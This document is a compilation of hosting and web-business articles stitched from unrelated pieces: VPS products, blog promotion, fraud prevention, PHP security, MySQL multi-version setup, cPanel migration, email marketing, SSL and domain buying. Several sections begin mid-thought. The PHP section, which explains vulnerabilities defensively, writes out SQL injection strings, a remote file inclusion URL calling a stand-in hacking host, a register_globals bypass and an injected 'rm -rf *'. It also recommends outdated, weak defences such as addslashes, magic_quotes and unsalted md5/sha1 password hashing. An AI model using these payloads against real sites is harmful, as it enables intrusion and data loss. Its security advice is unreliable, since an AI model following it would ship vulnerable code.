A virtual private server allows multiple customers to share the expense of hardware and network connections without sacrificing privacy, performance or preference. For this reason, VPS is considered one of the most sophisticated modes of automation available for provisioning small to mid-sized enterprise Web hosting.

The use of such technology allows hosting providers to save money by simulating the features of a dedicated server multiple times upon a single physical hosting environment, while concurrently allowing them to deliver high-quality Web services to their end users. VPS solutions allow Web hosting resellers to provide a full range of services usually only afforded by dedicated hosting technology. Resellers can therefore offer their clientele full administrative or “root” access to their Web services.

The virtual private server was first implemented by hosting giant NTT/Verio to bridge the gap between shared hosting environments and customized dedicated servers. By using a virtual private server, Web hosting resellers and Web designers can provide small businesses the performance, security, and control of dedicated hosting services at a fraction of the cost.

A virtual private server eliminates the restrictions of virtual hosting by providing all of the administrative features of a dedicated server. Each VPS user therefore receives their own set of services that they can customize to their specific needs. Virtual hosting is limited in comparison because its users do not have root access and software configurations cannot be customized, despite the fact that physical resources are also multiplexed. A virtual private server on the other hand, contains its own unique file system and CGI-BIN, disk space, system resources, bandwidth and memory allotments, which allow for a high level of customization.

Due to the fact that a VPS solution truly simulates a dedicated server, some technical understanding of server administration is required. Any true VPS solution will provide users with: “root” or full administrative access; guarantee a specific allocation of server resources, including CPU, memory and bandwidth; and allow the user to manage multiple servers and file areas through a sophisticated control panel.

A virtual private server will ensure “performance isolation” so that heavy traffic or CPU loads will not affect other VPS solutions on the same infrastructure. Others major features that characterize VPS solutions include: “fault tolerance,” which ensures that errors, which affect one specific private server, do not affect others; and “enhanced security,” which ensures that e-business applications can be deployed with greater privacy.

The most popular feature that VPS customers use, however, is the virtual private server’s capacity for “functional isolation.” Because a VPS has its own contained services, it is possible for users to install and customize their own open-source and commercial software packages.

Many virtual private servers on the Unix platform have become so advanced that they even permit users to install Linux RPM packages. This allows users to take source code for new software and package it into source and binary form, such that binaries can be easily installed and tracked, and source can be easily rebuilt. The use of RPM packages also allows VPS users to maintain a database of all packages and their files that can be used for verifying packages and querying for information about files and/or packages.

Small businesses that run their own e-commerce Web sites also appreciate the functional isolation of their private server, because it allows them to obtain their own secure certificates and shopping cart software for their e-business operations. Many sophisticated VPS solutions will even offer third-party plug-ins or modules, allowing users to take advantage of control panel functionality in order to install everything from the simplest CGI scripts to the most advanced shopping carts.

Due to these advantages, virtual private servers are very popular and are a relatively inexpensive choice for small to mid-sized enterprises seeking to maintain their own Web presence. VPS solutions are the natural choice for SMEs and individuals wishing to upgrade a shared or virtual hosting package. The following are descriptions of popular VPS packages now available through an assortment of major Web host vendors:

Ensim
Ensim’s award-winning product line includes control panels, virtual private servers, server management, as well as Microsoft Exchange hosting software.

H-Sphere
Hsphere is scalable multi-server, centralized hosting automation software with fully brandable resellers support, comprehensive recurrent billing, trouble ticket system as well as complete account provisioning automated signup. It supports Win2000, Linux & FreeBSD. It provides fully features, easy-to-use end user web based control panel, and powerful admin user interface.

SW-soft
SW-soft develops the Virtuozzo technology and the HSPcomplete hosting automation solution. SWsoft’s products deliver powerful, comprehensive solutions that power data center management and provide excellent return on investment.

Sphera
Sphera is a leading developer of Web hosting automation and management software for Internet data centers, ISPs and hosting providers. Sphera’s HostingDirector enables cost-cutting and revenue increases by automating Web hosting management, facilitating sales of value added applications, services and more.

These above hosting software firms develop popular and dependable VPS packages. Consider using a hosting firm that elects to use one of the above virtual private server systems.

One such tool is RSS, or Really Simple Syndication. It’s a family of Web feed formats used to publish frequently updated content such as blog entries, news headlines or podcasts. RSS makes it possible for people to keep up with a Web site in an automated manner that’s easier than manually logging in to check for updates. An easy way to get working with RSS is Feedburner (feedburner.com), which enables bloggers to easily create RSS feeds that will syndicate content to readers through feed aggregators. Users can check subscribed feeds regularly for new content and automatically download updates. An easy way to get people to subscribe to your blog’s RSS feed is adding the iconic RSS button to your blog’s layout.

Another button that, when added to your layout, can help your blog’s popularity is Technorati’s Favorites Feature (technorati.com), which enables readers to list and track up to 50 of their favorite blogs, and lists new posts from the blogs on the list, as they are updated.

Digg (digg.com) is a popular social ranking site that enables readers to submit content and raise the popularity of a blog  post, news article or video post by voting or “digging” the posts they like best. As a blogger, you can make your Web site easily “diggable” by adding a Digg link to your layout.

Social bookmarking site del.icio.us (del.icio.us) also enables readers to bookmark blogs or specific posts and share them as favorites with friends and the del.icio.us community. The primary use of del.icio.us is the storing of bookmarks online, which enables users to access and manage their bookmarks from any computer.

Having your blog listed among somebody’s del.icio.us favourites is advantageous because it makes it possible for other users in that community to come across it. Once again, you can simplify the process for readers by adding a del.icio.us link on the main page of your blog or on every page there is content.

Another Web site that works similarly in terms to making your blog easy to find is StumbleUpon (stumbleupon.com). This Web site is similar to del.icio.us in the sense that people can add your Web site to the StumbleUpon database. There they can rate it as thumbs up or thumbs down.

Once the Web site or blog post is in the database, other Stumblers will be able to, well, stumble upon it and add their rating. StumbleUpon uses ratings to form collaborative opinions on Web site quality. Users only see pages that friends and like-minded stumblers have recommended. This helps users discover great content they probably wouldn’t have found using a search engine.

One of the simplest ways to prevent fraud is to address the matter on your Web site. By placing fraud notices, buttons and images on your site and order forms, you can deter some potential online scammers simply out of fear. Explain that violators will be pursued to the fullest extent of the law and that they can be tracked by their IP and email addresses.

Second, carefully review your orders. Make sure the consumer filled out all the information correctly and that it matches the information that the card-issuing bank has on file. This isn’t always the best judge of a fraudulent order as sometimes the billing address will differ from the shipping address if your product is being sent as a gift. But use extra precaution when the information doesn’t match up. One way to clear up any confusion is by actually calling or emailing your customer before you process the order.

You should also be cautious when dealing with orders from outside the US, especially if you’re a small to medium-sized business operating in the US; you are prohibited from doing business with countries that are subject to US Embargo. Reports show that a majority of fraudulent orders originate from countries in Asia, Africa and the Middle East. More detailed lists are available from resources like the American Registry for Internet Numbers (arin.net) or Asia Pacific Network Information Centre (apnic.org). Experts say that many fraudsters also use free email addresses because they make it easier to hide an identity. Take the time to check online databases that list all the different free email providers. A good source is EmailAddresses.com (emailaddresses.com).

Using fraud prevention software provides a more automated way to protect your orders from fraud.

VariLogiX (varilogix.com) offers a product called FraudCall, an automated telephone service that verifies product orders. The tool places out-bound telephone calls to customers to verify their orders while they are still on a merchants’ Web site placing the order, so there is no delay with verification. A basic account starts at $9.99 a month.

Another option is Fraudguardian (fraudguardian.com), which lets you integrate real-time fraud scoring into your own order form or e-commerce software. With each fraud score calculated by FraudGuardian, the score and location is saved for statistical purposes. These enable the software provider to show “fraud hot spots” or “fraud clusters” by domain and by country. The company says it can help protect businesses from charge backs by using the fraud score to weed out fraudulent orders before they come back to hurt the bottom line. Customers can choose from eight packages starting at $5.95 a month.

Keep in mind that using more than one precautionary measure will increase your chances of protecting yourself from e-commerce fraud. And you should constantly update your prevention processes to keep your business as safe as possible.

PHP is a popular server-side scripting language for serving dynamic pages. It’s simple to code and debug and has good support with database like mysql, mssql, oracle. Insecure php code, however is very simple to hack.

This article explains a few such vulnerabilities, so that you can avoid them in your scripts. I will also explain methods to tweak PHP config files(php.ini) for maximum security.

PHP run with Nobody Permission

Problem:

In Cpanel servers PHP runs with nobody permission. This may become a major security issue if the permission you have given is 777. This will allow the ‘nobody’ user to edit the file and execute it. So always keep an eye on the permissions of your files.

Solution :

Always set the php script permission to 755 so that others cannot edit or change it. Enable PHPsuexec on the server. PHPsuexec will not allow php script to run as 777 permissions and also users cannot read another users’s file. In PHPsuexec enabled servers, its common to find out the source of spamming from php scripts using mail() functions. So in shared-servers, always enable phpsuexec for maximum security.

Issues with global variables

Problem:

Using register_globals makes your coding easier. With register_globals=ON you can pass values to another php page. But making register_globals=ON can make your scripts vulnerable. Since php does not require the variables to be initialized users can assign any values to them using register_globals. With a creative mind anyone can access the protected area of the code. Here is an example.

Consider this as password.php

if ($KEY == “XXXX”) {$check = 1;}
if ($check == 1) { //YOUR CODE GOES HERE( admin area)}

You can pass values as “password.php?$check=1″ and will allow you to go to the “admin area” whether you entered correct KEY or not.

Solution:

One way is to disable register_globals but this will make you difficult for your coding. Otherwise make sure that you have initialized the variables.In this case initialize $check = 0. You can enable register_globals in your server but always note the security issues with it.

Problems with functions like exec() , system() and backticks

Problem:

Functions like exec() and system() are used for executing external programs.
So it can execute the shell command also. If you pass a user input value to exec() function it can make very bad results. If you call system($input_from_user) function user can enter any command as input and execute in your machine. Even he can delete all the contents by just giving
“rm -rf * ” . Also in the exec() function user can enter any command by just using a semi-column (;) in the argument section.

Solution:

Disable insecure functions using disable_functions in php.ini.
You can use like ,

disable_functions = system,exec

Also you can use EsacpeShellCmd() before passing the value to system() or exec() functions. It will escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands.

EscapeShellArg() can also be used for the same purpose. It will put single quotes around the string. So it will escape any existing single quotes in the string.

Including Files

You can include a php script in other php page with ‘ include ‘ .

But if the page path is passed as a variable then you may get in trouble. The user can include a remote file which may contain malicious scripts. The hacker can also include other local files also.

If our php page include.php is like

$page=$_GET[’path’];
include $page;

Then, “include.php?path=http://hackingsite.com/hacking.php” will include the remote file hacking.php so that hacker can execute the hacking.php script in your server.

Solution:

You can disable the inclusion of remote files by editing the value of allow_url_fopen. Set this as OFF in php.ini. Also set the open_basedir correctly in the php.ini . Using open_basedir will restrict the file inclusion upto to the defined directory. Also check the file name with a ’switch’ or ‘if’ to make sure that it is an allowed one.

SQLInjection Attacks

Problem:

PHP is well packaged for its use with mysql.But using some simple techniques others can hack into your database. If your script is not secured well users can execute any sql commands.

Let me explain an example.

$user = $_POST[’username’];
$pass = $_POST[’password’];
$result = mysql_query(”SELECT AcctNo FROM Users WHERE Username = ‘”.$user.”‘ and Password = ‘”.$pass.”‘”);

Consider one user has entered a username as

‘ OR 1=1 #

and password as XXXX

Then our query will be

SELECT AcctNo FROM Users WHERE Username = ” OR 1=1 #’ and Password = ‘XXXX’
Mysql consider all after the ‘#’ as comments so it will ignore it. So with
the remaining query it will always select all the account numbers and will
return it. So the user can get the account numbers even though he does not have any correct username and pasword.

Also giving password: as some_value’ OR ‘X’='X will also bypass this query.

Solution:

The problem here come from the ‘ (single quotes) entered by the user. In order to disable it we have two ways. First is the function addslashes() . It will add a /(slash) before all ‘ (quotes) so it will be have no effect. So before executing the query you should pass it addslashes() function. That is, it should be like

$user = addslashes($_POST[’username’]);
$pass = addslashes($_POST[’password’]);

Another option is using the magic_quotes_gpc . You can set its value as ‘On’ in the php.ini . If it is On then it will add a backslash before all single quotes and double quotes in the string comming from a HTML form. So we can escape it.

Upto now i have described some of the common mistakes that can come across your php scripts. Next i am going explain about some of the security measures that you have to note for securing your php.

Configure your php.ini

php.ini is the configuration file of PHP. Its has a number of variables. You can set the values of these variables for making your php scripts more secure. Here am explaining some of the them.

1) display_errors

Disable the display_errors is the first thing. If it is ‘ On ‘ the errors on execution will be displayed to the user’s browser window. So the user can get an idea about the table structure and directory structure. You can avoid this by disabling display_errors in php.ini

Usage : display_errors=OFF

2) safe_mode

safe_mode is more relevent in a shared server environment. If safe_mode is enabled it will check a UID/GID comparison check on the file/directory to be accessed and compare it to the uid/gid of the script that is trying to access the file. If that are same it will allow the file access if not it will block the access. If you want to compare only GID then you can enable ” safe_mode_gid” value in php.ini .

3)sql.safe_mode

Make sql.safe_mode as Off. If it is on mysqli_connect() and mysql_connect() will connect to mysql with default username and password.

4)magic_quotes_gpc

Enable magic_quotes_gpc so that you can make your user inputs secure. It work s same as addslashes() function. It will add a backslash (\) with every single quotes, double quotes.

5)safe_mode_allowed_env_vars and safe_mode_allowed_env_vars

These two variables will protect environment variables from changing using user php scripts. The field safe_mode_allowed_env_vars contains a list of prefixes that identify the names of the environment variables the user is allowed to change. So that environment variables which are not starting with one of them defined in safe_mode_allowed_env_vars cannot be modified.

Another configuration safe_mode_protected_env_vars will set the names of environment variables that the user is not allowed to modify even if it is present in safe_mode_allowed_env_vars.

6)disable_functions

This will allow you to disable the insecure functions such as shell_exec, system,exec.

Take your own logical measures

Besides all these you can take your own security measures while writing php scripts. For example always store your passwords as hashed values. PHP has inbuilt hashing function named md5() and sha1 . md5() is a 128-bit and sha1() is a 160-bit hashing algorithm. If you use this hashing techniques you can save your passwords and important data from hackers even though your databases are compromised.

Always test your codes for different type of inputs and search for any security flaws. Keep in mind that every user input to your php scripts can be malicious. We cannot make our scripts a perfect one but always try for that.

Happy Coding……

Sometimes we may require to run multiple versions of MySQL on the same Server. This can happen if you either need to test a new MySQL release or you need a new MySQL version and you don’t want to make any changes to the existing system.

The whole idea behind this is to compile the new MySQL server with different TCP/IP ports and Unix socket files so that each one is listening on different network interfaces. Compiling in different base directories for each installation also results in separate compiled-in data directory, log file, and PID file location for each server.

First download the source the tar file from mysql.com.

$> tar xfz mysql.tar.gz
$> cd mysql.XX

Important:

“/etc/my.cnf ” is the default file that is used by a mysql server. When the new version is tested it will load the default configuration’s in /etc/my.cnf.

To resolve this I replaced every instance of ” cnf ” inside the source folder to ” conf ” by using this following command.

find ./ -type f | xargs perl -pi -w -e ’s/cnf/conf/g;’

1) The default user generally is “mysql”. Add another user and group for example mysqlt for the new version of MySQL.

2) A typical ./configure command…

./configure –prefix=/usr/local/mysql –enable-local-infile
–with-tcp-port=4444 –with-mysqld-user=mysqlt
–with-base_dir=/usr/local/mysql –with-log=/usr/local/mysql/mysqld.log
–with-pid_file=/usr/local/mysql/mysqld.pid
-with-unix-socket-path=/tmp/mysqlt.sock –localstatedir=/var/lib/mysqlt

The new values you will use for your new MySQL server are:

Port number : 4444
mysql user : mysqlt
base_dir :  /usr/local/mysql
data directory : /var/lib/mysqlt
log file : /usr/local/mysql/mysqld.log

3) Compile and Install

make && make install

4)Create your new MySQL config file.

cp support-files/my-medium.conf /etc/my.conf

cd /usr/local/mysql
bin/mysql_install_db –user=mysqlt  ( this will install all the needed databases )
bin/mysqld_safe –user=mysqlt &

TO SET A PASSWORD FOR THE MySQL root USER

/usr/local/mysql/bin/mysqladmin -u root -h hostname password ‘new-password’
/usr/local/mysql/bin/mysqladmin -u root password ‘new-password’

5) To start the service

cd /usr/local/mysql
./share/mysql/mysql.server start

6) To test

#telnet localhost 4444
and you should see this
Trying 127.0.0.1…

Connected to localhost.

Escape character is ‘^]’.

+ 4.0.26-logIE^*THL

And you are done. You can copy mysql.server >> rc.d to start it when the server is rebooted.

With these steps, you can download and configure different mysql versions to use different values for port, datadirectory, mysql user, configuration file etc….

Warning: You should never have two servers that update data in the same databases.

Moving all the accounts between two Servers that host the same control panel is usually not a very difficult process.

But like G.B. Shaw said,

“If you have an apple and I have an apple and we exchange these apples then you and I will still each have one apple. But if you have an idea and I have an idea and we exchange these ideas, then each of us will have two ideas”

This article is a different but successful way of migrating entire servers between two cpanel servers.

Scenario:

You need to move all domains from the present server to the new server. At the same time, you need the whole move done perfectly and with zero downtime for all domains. In addition, you need to move even your nameservers between two different datacenters. Its pretty complicated.

Migration implementation

1. The nameservers and the domains TTL (Time To Live) needs to be reduced to, say between 30 minutes to 1 hour. This change has to be effected at least one week before the IP changes, as it needs time to propogate to the various ISP’s all around the world. This ensures that the fresh zone files are loaded all around the world faster and that they access the old server for a shorter duration.

2. Accounts need to be moved to the new server. All information just prior to the IP changes of the client should not be lost and hence “rsync” is the needed just prior to the move.

3. The change over should have minimum impact in terms of site accesses becoming slow or mails being lost.

4. The new server needs to be setup and properly configured prior to the move and all necessary softwares need to be installed.

5. A study of the top 10 domains that use maximum softwares/resources on the server needs to be done. This way, once the move is done, they are checked to first ensure everything is working like ins the old server.

Nameserver TTL

Login to the cpanel WHM,

http://oldserver.com:2086
Username : root
Password : “your password”

Then Go to the following link

Main –> Server Configuration –> Basic cPanel/WHM Setup

Set Domain Time to Live & Nameserver Time to Live to 3600 seconds and save changes.

Moving Accounts

Login to the WHM of the new server and go to

Main –> Transfers –> Copy multiple accounts from another server

Enter the old server’s IP address, enter the password and click on “grab account list”

This will give you a list of all the accounts on the old server. Select the accounts you need copied over and once completed, initiate the transfer.

Once this transfer is completed, (it may take anywhere between 2-12 hours depending on connection speeds, server utilization, size of accounts being moved) only then should you close the window. Any connection breakup would mean you would need to terminate the copy on the new server and reinitiate the transfer again from the one where the connection broke.

You will get a status report on all account moves that were successful. Accounts that have a “-” in their username is not accepted in the new cPanel taxonomy, so you would need to manually make changes and copy those accounts over on to the new server.

Rsync

Once the account moves are done, the next thing would be that till the ip changes, nameserver changes are done for the accesses to be directed to the accounts on the new server, we would need to ensure that they are synchronized and no data is lost.

To rsync, follow these steps:

a) Setup ssh-key

b) rsync the folders /home , /var/cpanel , /var/lib/mysql , /usr/local/cpanel/3rdparty/mailman
, /usr/local/cpanel/base/frontend , /etc/valiases , /etc/vdomainaliases , /etc/vfilters using the commands

for user in `cat /home/tomove`; do rsync -avuz -e ssh root@OLDSERVERIP:/home/$user/ /home/$user; done
rsync -avuz -e ssh root@OLDserverIP:/var/cpanel  /var/cpanel
rsync -avuz -e ssh root@OLDserverIP:/var/lib/mysql /var/lib/mysql
rsync -avuz -e ssh root@OLDserverIP:/usr/local/cpanel/3rdparty/mailman /usr/local/cpanel/3rdparty/mailman
rsync -avuz -e ssh root@OLDserverIP:/usr/local/cpanel/base/frontend /usr/local/cpanel/base/frontend
rsync -avuz -e ssh root@OLDserverIP:/etc/valiases /etc/valiases
rsync -avuz -e ssh root@OLDserverIP:/etc/vdomainaliases /etc/vdomainaliases
rsync -avuz -e ssh root@OLDserverIP:/etc/vfilters /etc/vfilters

Fixing Databases

Once rsync is completed, you need to repair the mysql databases since they get corrupted.

By running /scripts/fixmysql on the new server and verifying if the databases are showing to be ok, you can ensure that there is no corruption in databases. Just run the following commands after going to /var/lib/mysql on the new server

/scripts/fixmysql;/usr/bin/mysql_fix_privilege_tables;/usr/bin/mysqlcheck -A –auto-repair;myisamchk -r -e ./*

Setting up Cron

You can setup Cron scheduler to repeat the rsync every couple of hours till the IP’s on the old server are changed to that of new servers. This ensures minimum loss of data.

Changing IP on the OLD Server

Initially when you move accounts to the new server, you need to ensure they all use the same shared IP and we need to keep a list of the accounts that need unique IP. Once the account moves are completed, do the following steps on the old server:

Change the IP the zone files of the DNS on old server to new server.

cd /var/named
perl -pi.bak -e “s/[oldip]/[newip]/g” *.db

Next, do these steps:

mv /etc/secondarymx /etc/secondarymx.orig
mv /etc/localdomains /etc/secondarymx
mv /etc/secondarymx.orig /etc/localdomains

This ensures that mails sent locally within the server as well as using forms, also go to the new server instead of being sent to the local mailboxes.

In 24 hours time, if everything is working fine and the accesses are moving to the new server, set the TTL and nameserver TTL on the new server to 14400 and you can shutdown the old server. Also you can change the IP’s of dedicated IP clients to unique IP’s and everything should work fine.

Companies like Ning.com (ning.com) and GoingOn (goingon.com) enable businesses to sign up and create social networks they can customize and brand as their own.

Ning.com says businesses can be up and running within minutes, with multiple administrators, custom member profile questions, tools for uploading photos, videos and music, blogging tools and widget add-ons. A basic Ning.com social networking site is free and comes with 5 GB of storage and 100 GB of bandwidth. However, businesses can enhance their sites by running ads for $19.95 per month, using their own domain names for $4.95 per month and increasing their capacity for $9.95 each month for each additional 5 GB of storage and 100 GB of bandwidth.

GoingOn similarly allows multiple administrators, corporate branding and music, video and photo sharing, but differentiates itself with “networked blogging,” which lets businesses aggregate people around shared interests, solicit feedback and opinion and capture knowledge. Signup is free.

Other companies offer single-license software that businesses can host themselves or through a recommended hosting provider. Alstrasoft.com (alstrasoft.com/efriends.htm) offers a social networking package called E-friends for $280 per year with features including blogs, forums, text-based chat and event planning. Administrators can use the integrated banner ads system to earn extra income by publishing paid banner ads on their E-Friends sites. Alstrasoft says customers can either host the software on their own servers, or sign up with its recommended hosting provider Ubiquity Web Hosting (ubiquityhosting.com) and receive a $100 discount for the E-friends script.

Another software option is Web Scribble Solutions’ webNetwork (webscribble.com/products/webnetwork/index.shtml) that businesses can purchase for $199. Web Scribble also offers Web hosting services for customers, starting at $9.99 for 500 MB of space, 50 GB of bandwidth and one MySQL database.

If you prefer to purchase software and install it on a local computer, Email Marketing Director by Arial Software (arialsoftware.com/emailmarketingdirector.htm) is a good option. The software works with most Windows operating systems, functions even on dial-up connection and enables non-technical individuals to create and deliver personalized email marketing campaigns. It also has a built-in database supporting an unlimited number of lists, pre-made email newsletter templates, automatic bounce and unsubscribe handling and simple email personalization.

When installing the software on your own infrastructure, it’s important to be aware of the kind of restrictions your ISP may have on bulk email sending, whether it’s a size limit, batch size limit or complete ban on sending bulk messages. Businesses can purchase Email Marketing Director for $495 and maintain a support plan for $149 per year.

A popular alternative to installing software is to sign up with email newsletter software providers who host your email campaigns and database on their servers. IContact (icontact.com) is an on-demand email marketing service that enables users to create, send and track email newsletters, RSS feeds, surveys and autoresponders. It includes open and clickthrough tracking, WYSIWYG newsletter editor, CAN-SPAM compliance and over 300 templates to choose from. With iContact, users pay a monthly fee based on the number of subscribers. Plans start at $9.95 per month or $107.46 per year for 500 contacts and under and users can send up to six times their subscriber limit per month.

Another company that offers email newsletter marketing services is Vertical Response (verticalresponse.com). Not unlike iContact, it enables users to send out messages with customized newsletters or one of the templates, utilize free opt-in forms that turn Web site visitors into actual email leads and offers free data hosting with unlimited list uploads at no charge. One big difference is rather than paying a monthly fee, users can either pay as they go on a per campaign basis or buy in bulk and subtract from a total amount of credits every time they email. To send up to 1,000 emails, it costs $0.015 per email or $15.00 per 1,000 emails and the cost decreases with the larger number of emails you send.

Whatever software you decide to go with, email newsletter software will help drive Web sites sales, qualified leads, retail store visits, ticket sales or increase readership of your content. You just have to decide on whether you want it installed on your own machines or sign up with a email marketing service provider and let them host your content.

Secure Sockets Layer is a global standard security technology developed by Netscape in 1994 and creates an encrypted link between a Web server (your Web site) and a Web browser (the potential customer) to ensure that all data transmitted remains private and secure. SSL technology makes it easier for customers to trust you by displaying a certificate authority’s badge of certification on your site or the “golden padlock,” which appears in a user’s browser to indicate they are viewing a secure Web page.

An SSL certificate has become an important badge of trust for any online retailer, providing assurance to your customers that their data cannot be tampered with or forged and ensure that your customers’ sensitive data is transmitted securely.

Besides purchasing a basic SSL certificate capable of 128-bit encryption, many certificate authorities now offer an Extended Validation SSL certificate option as well. To issue an SSL certificate that complies with the standard, a certificate authority must adopt the extended certificate validation practice and pass an audit. When shoppers visit a Web site secured with an EV SSL certificate, new high-security browsers, such as Internet Explorer 7, trigger the address bar to turn green and display the name of the organization listed in the certificate as well as the certificate authority.

There are many certificate providers that offer both SSL and EV SSL certificates, one of which is GeoTrust (geotrust.com), owned by VeriSign. The company offers a basic SSL certificate package, QuickSSL, for $249 per year as well as a higher assurance option with its True BusinessID with EV package, which comes with up to 256-bit encryption, the GeoTrust True site seal and triggers the green bar in high-security Web browsers. This package starts at $899 per year.

Comodo (comodo.com) also offers standard SSL and EV SSL certificate options. For $79.95 per year, businesses can purchase an Essential SSL certificate, which ensures that information is kept private while being transmitted, verifies the control and registration of a Web site’s domain and businesses get a golden padlock and are ready to sell online within minutes of purchasing. Comodo’s EV SSL certificates work with the latest releases of major browsers and start at $849 per year.

Thawte (thawte.com), also owned by VeriSign, is a little more diverse in its SSL certificate offerings. However, a basic SSL Web Server certificates starts at $249.00 per year and comes with full authentication capable of 256-bit encryption, while the company’s SSL Web Server Certificate with EV starts at $899 per year.

One is to simply alter your domain name, which of course depends on how strongly you feel about the exact form of your proposed domain name. You can often find the domain name you’re looking for with a different suffix like .net, .org, .biz or .info. Or sometimes you can find a .com version of your domain if you change the name slightly.

So if “mybusiness.com” is already taken, you might find that something like “my-business.com” is available. However, using a domain name very similar to an existing one may result in trademark infringement, which could lead to a court order to stop using the name and pay money damages to the other domain name owner.

If you’re adamant about getting the domain name you originally wanted, there are a couple of different options there as well.

Companies like Sedo (sedo.com) and GoDaddy’s The Domain Name Aftermarket (tdnam.com) keep close tabs on the secondary domain market and offer services like domain name auctions and domain brokerage for individuals and businesses that are intent on getting the domain name of their dreams.

Sedo has a Marketplace Auction where many expired or high-demand domain names are placed for auction and sold to the highest bidder. The process is pretty straightforward, an auction runs for a maximum of one week and in the end, the domain is transferred to the new owner through Sedo’s secure escrow service.

The only limitation here is that just because the domain you want is up for grabs, doesn’t necessarily mean it belongs to Sedo, so you should double check who owns your desired domain name first and then go to the registrar that is listed under or the location that it is parked. You can easily search for these details through a “WHOIS Lookup” (whois.net).

Sedo also offers a domain brokerage service for to help acquire domain names that belong to someone else. Domain professionals conduct extensive research and analysis to provide you with a comprehensive evaluation of the domain’s fair market value and then assist you in determining a reasonable budget to pursue the domain.

Your broker then begins negotiating to secure the domain at the best price while preserving your identity and once there is an agreement of sale, Sedo’s transfer technicians step in to facilitate the domain transfer ensuring security, transparency and a quick change of ownership. You can utilize Sedo’s brokerage service starting at $69.

GoDaddy’s The Domain Name Aftermarket charges a little differently and requires interested domain name sellers and buyers to subscribe for the domain name aftermarket service with an annual fee of $4.99 that enables customers to place bids on expired domain names in a seven-day public auction, backorder domain names so that they’re owned the instant they’re available, as well as make an offer on a domain name and instantly notify the seller, who then has the option of accepting or countering your offer.

One advantage with GoDaddy’s service is that it also offers a 100-Name Domain Monitoring Pack where users can monitor the status of any domain name regardless of the person who registered it or the registrar it belongs to, enabling interested domain buyers to have an overall advantage with all soon-to-expire domain names.